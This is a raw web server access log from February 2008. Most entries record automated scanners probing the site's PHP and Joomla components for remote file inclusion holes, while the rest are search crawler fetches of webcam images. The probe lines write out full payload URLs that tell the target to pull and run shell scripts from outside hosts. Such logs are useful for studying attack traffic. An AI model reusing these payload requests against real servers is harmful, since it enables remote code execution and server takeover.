62.193.236.107 - - [26/Feb/2008:06:36:03 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:36:03 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:36:27 -0800] "GET /retreat1/webcam/retreat1_00045.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:36:35 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:36:38 -0800] "GET /retreat1/webcam/retreat1_00559.jpg HTTP/1.0" 200 51278 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
205.234.200.223 - - [26/Feb/2008:06:36:48 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/ghanjar.satriani/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [26/Feb/2008:06:36:48 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/ghanjar.satriani/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [26/Feb/2008:06:36:48 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/ghanjar.satriani/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.148.95.146 - - [26/Feb/2008:06:36:50 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:36:54 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:36:59 -0800] "GET /retreat1/webcam/retreat1_00716.jpg HTTP/1.0" 200 26838 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
62.193.236.107 - - [26/Feb/2008:06:37:00 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:37:15 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:37:19 -0800] "GET /retreat1/webcam/retreat1_00410.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:37:19 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [26/Feb/2008:06:37:19 -0800] "GET /logs/access_080120.log///////admin.php?include_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [26/Feb/2008:06:37:19 -0800] "GET ///////admin.php?include_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [26/Feb/2008:06:37:19 -0800] "GET /logs///////admin.php?include_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.50.53.151 - - [26/Feb/2008:06:37:24 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:37:35 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:37:35 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:37:36 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:06:37:38 -0800] "GET /logs/access_080126.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:37:39 -0800] "GET /retreat1/webcam/retreat1_00238.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:37:43 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:37:45 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:37:49 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:37:53 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:37:54 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:37:58 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:38:00 -0800] "GET /retreat1/webcam/retreat1_00237.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:38:02 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.208.16.77 - - [26/Feb/2008:06:38:15 -0800] "GET /logs/access_080118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:38:21 -0800] "GET /retreat1/webcam/retreat1_00491.jpg HTTP/1.0" 200 18096 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
70.168.74.131 - - [26/Feb/2008:06:38:35 -0800] "GET //?mos/index.php?sourcedir=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 200 3094 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
70.168.74.131 - - [26/Feb/2008:06:38:35 -0800] "GET /logs//?mos/index.php?sourcedir=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 200 36264 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
62.193.236.107 - - [26/Feb/2008:06:38:35 -0800] "GET /logs/access_071225.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:38:41 -0800] "GET /retreat1/webcam/retreat1_00356.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
222.236.47.176 - - [26/Feb/2008:06:39:07 -0800] "GET /logs/access_071224.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:39:07 -0800] "GET /retreat1/webcam/retreat1_00093.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
222.236.47.176 - - [26/Feb/2008:06:39:07 -0800] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [26/Feb/2008:06:39:08 -0800] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.116.41.19 - - [26/Feb/2008:06:39:14 -0800] "GET /logs/access_080120.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.35.158.181 - - [26/Feb/2008:06:39:17 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.35.158.180 - - [26/Feb/2008:06:39:20 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.35.158.180 - - [26/Feb/2008:06:39:25 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:39:28 -0800] "GET /retreat1/webcam/retreat1_00427.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
217.148.95.146 - - [26/Feb/2008:06:39:33 -0800] "GET /logs/access_071225.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
222.236.47.176 - - [26/Feb/2008:06:39:34 -0800] "GET /logs/access_071214.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:39:56 -0800] "GET /retreat1/webcam/retreat1_00830.jpg HTTP/1.0" 200 50773 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
62.193.236.107 - - [26/Feb/2008:06:39:56 -0800] "GET /logs/access_080126.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.200.223 - - [26/Feb/2008:06:40:32 -0800] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/ghanjar.satriani/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.135.90 - - [26/Feb/2008:06:40:50 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.iblon.it/images/stories/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.120.255.114 - - [26/Feb/2008:06:41:04 -0800] "GET /SQuery/lib/gore.php?libpath=http://www.geocities.com/aroganz1/tools/safeoff.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
85.120.255.114 - - [26/Feb/2008:06:41:04 -0800] "GET /logs/SQuery/lib/gore.php?libpath=http://www.geocities.com/aroganz1/tools/safeoff.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
61.100.189.222 - - [26/Feb/2008:06:41:05 -0800] "GET /logs/access_080131.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/s3t4n_b4nd3l/idid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.148.95.146 - - [26/Feb/2008:06:41:16 -0800] "GET /logs/access_080126.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.195.58.176 - - [26/Feb/2008:06:41:56 -0800] "GET /logs/access_080122.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.125 - - [26/Feb/2008:06:42:11 -0800] "GET /minamijewelry/moon.psd HTTP/1.0" 200 108656 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:42:42 -0800] "GET /retreat1/webcam/retreat1_00004.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:42:47 -0800] "GET /retreat1/webcam/retreat1_00367.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:06:42:54 -0800] "GET /logs/access_080119.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.236.107 - - [26/Feb/2008:06:43:04 -0800] "GET /logs/access_080119.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:43:09 -0800] "GET /retreat1/webcam/retreat1_00702.jpg HTTP/1.0" 200 50956 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
81.25.120.246 - - [26/Feb/2008:06:43:16 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.25.120.246 - - [26/Feb/2008:06:43:16 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.25.120.246 - - [26/Feb/2008:06:43:17 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:43:32 -0800] "GET /retreat1/webcam/retreat1_00641.jpg HTTP/1.0" 200 15349 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:43:51 -0800] "GET /retreat1/webcam/retreat1_00245.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
72.36.135.90 - - [26/Feb/2008:06:44:04 -0800] "GET //login.php?dir=http://www.iblon.it/images/stories/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.236.107 - - [26/Feb/2008:06:45:25 -0800] "GET /logs/access_080106.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:45:29 -0800] "GET /retreat1/webcam/retreat1_00853.jpg HTTP/1.0" 200 46837 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
212.175.17.98 - - [26/Feb/2008:06:45:34 -0800] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.175.17.98 - - [26/Feb/2008:06:45:35 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.95.146 - - [26/Feb/2008:06:46:01 -0800] "GET /logs/access_080119.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:46:47 -0800] "GET /retreat1/webcam/retreat1_00297.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
212.175.17.98 - - [26/Feb/2008:06:46:48 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:46:53 -0800] "GET /retreat1/webcam/retreat1_00577.jpg HTTP/1.0" 200 17153 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
62.193.236.107 - - [26/Feb/2008:06:46:55 -0800] "GET /logs/access_071220.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.23.116 - - [26/Feb/2008:06:47:02 -0800] "GET /logs/access_070826.log HTTP/1.0" 200 50531 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:47:14 -0800] "GET /retreat1/webcam/retreat1_00916.jpg HTTP/1.0" 200 16856 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:06:47:18 -0800] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://jobarte.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:06:47:18 -0800] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://jobarte.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:06:47:18 -0800] "GET /logs/access_080106.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:06:47:21 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://jobarte.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:06:47:21 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://jobarte.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:06:47:22 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://jobarte.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:06:47:22 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://jobarte.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.236.107 - - [26/Feb/2008:06:47:23 -0800] "GET /logs/access_080120.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:06:47:23 -0800] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://jobarte.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:06:47:25 -0800] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://jobarte.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:47:25 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:47:28 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:47:29 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:47:36 -0800] "GET /retreat1/webcam/retreat1_00296.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
72.36.135.90 - - [26/Feb/2008:06:47:46 -0800] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://www.iblon.it/images/stories/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.135.90 - - [26/Feb/2008:06:47:46 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.iblon.it/images/stories/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.135.90 - - [26/Feb/2008:06:47:47 -0800] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://www.iblon.it/images/stories/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:47:59 -0800] "GET /retreat1/webcam/retreat1_00731.jpg HTTP/1.0" 200 16622 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:48:02 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:48:03 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:48:09 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:48:10 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:48:11 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:48:11 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:48:12 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:48:14 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:48:18 -0800] "GET /retreat1/webcam/retreat1_00464.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:48:19 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:48:36 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:48:37 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.180.32 - - [26/Feb/2008:06:48:37 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:48:40 -0800] "GET /retreat1/webcam/retreat1_00001.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
218.50.53.151 - - [26/Feb/2008:06:48:54 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
